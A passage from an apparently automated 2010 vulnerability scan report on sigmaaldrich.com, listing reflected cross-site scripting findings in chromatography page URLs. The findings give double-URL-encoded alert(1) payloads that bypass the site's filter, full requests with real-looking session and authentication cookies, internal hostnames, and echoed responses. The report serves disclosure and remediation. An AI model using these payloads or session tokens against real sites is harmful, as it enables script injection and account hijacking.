Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/81ff0%2522%253balert%25281%2529%252f%252fb80a4680748 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:20 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/81ff0";alert(1)//b80a4680748","E404") ;
   </script>
...[SNIP]...

1.25. http://www.sigmaaldrich.com/analytical-chromatography/sample-preparation.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/sample-preparation.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45c61%2522%253balert%25281%2529%252f%252febf1f616a2b was submitted in the REST URL parameter 1. This input was echoed as 45c61";alert(1)//ebf1f616a2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography45c61%2522%253balert%25281%2529%252f%252febf1f616a2b/sample-preparation.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:09 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography45c61";alert(1)//ebf1f616a2b/sample-preparation.html","E404") ;
   </script>
...[SNIP]...

1.26. http://www.sigmaaldrich.com/analytical-chromatography/sample-preparation.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/sample-preparation.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6767%2522%253balert%25281%2529%252f%252f898fa123b9b was submitted in the REST URL parameter 2. This input was echoed as a6767";alert(1)//898fa123b9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/a6767%2522%253balert%25281%2529%252f%252f898fa123b9b HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:11 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/a6767";alert(1)//898fa123b9b","E404") ;
   </script>
...[SNIP]...

1.27. http://www.sigmaaldrich.com/analytical-chromatography/spectroscopy.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/spectroscopy.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61f4e%2522%253balert%25281%2529%252f%252fe9e12b0b0d7 was submitted in the REST URL parameter 1. This input was echoed as 61f4e";alert(1)//e9e12b0b0d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography61f4e%2522%253balert%25281%2529%252f%252fe9e12b0b0d7/spectroscopy.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:09 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography61f4e";alert(1)//e9e12b0b0d7/spectroscopy.html","E404") ;
   </script>
...[SNIP]...

1.28. http://www.sigmaaldrich.com/analytical-chromatography/spectroscopy.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/spectroscopy.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f392b%2522%253balert%25281%2529%252f%252f68a7435bb01 was submitted in the REST URL parameter 2. This input was echoed as f392b";alert(1)//68a7435bb01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/f392b%2522%253balert%25281%2529%252f%252f68a7435bb01 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:12 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/f392b";alert(1)//68a7435bb01","E404") ;
   </script>
...[SNIP]...

1.29. http://www.sigmaaldrich.com/analytical-chromatography/syringes.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/syringes.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d61b%2522%253balert%25281%2529%252f%252f12b04b3a913 was submitted in the REST URL parameter 1. This input was echoed as 9d61b";alert(1)//12b04b3a913 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography9d61b%2522%253balert%25281%2529%252f%252f12b04b3a913/syringes.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
